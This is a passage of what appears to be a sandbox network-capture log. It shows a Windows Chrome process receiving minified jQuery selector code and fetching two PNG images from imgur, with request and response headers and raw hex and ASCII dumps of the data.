6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2025-03-27 17:29:11 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2025-03-27 17:29:11 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2025-03-27 17:29:11 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	199.232.88.193	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:12 UTC	587	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:12 UTC	761	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 802261 Date: Thu, 27 Mar 2025 17:29:12 GMT X-Served-By: cache-iad-kiad7000021-IAD, cache-ewr-kewr1740052-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 1296, 0 X-Timer: S1743096552.108162,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-27 17:29:12 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	199.232.88.193	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:12 UTC	587	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:12 UTC	759	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 555361 Date: Thu, 27 Mar 2025 17:29:12 GMT X-Served-By: cache-iad-kjyo7100129-IAD, cache-ewr-kewr1740054-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 4, 0 X-Timer: S1743096552.108839,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-27 17:29:12 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 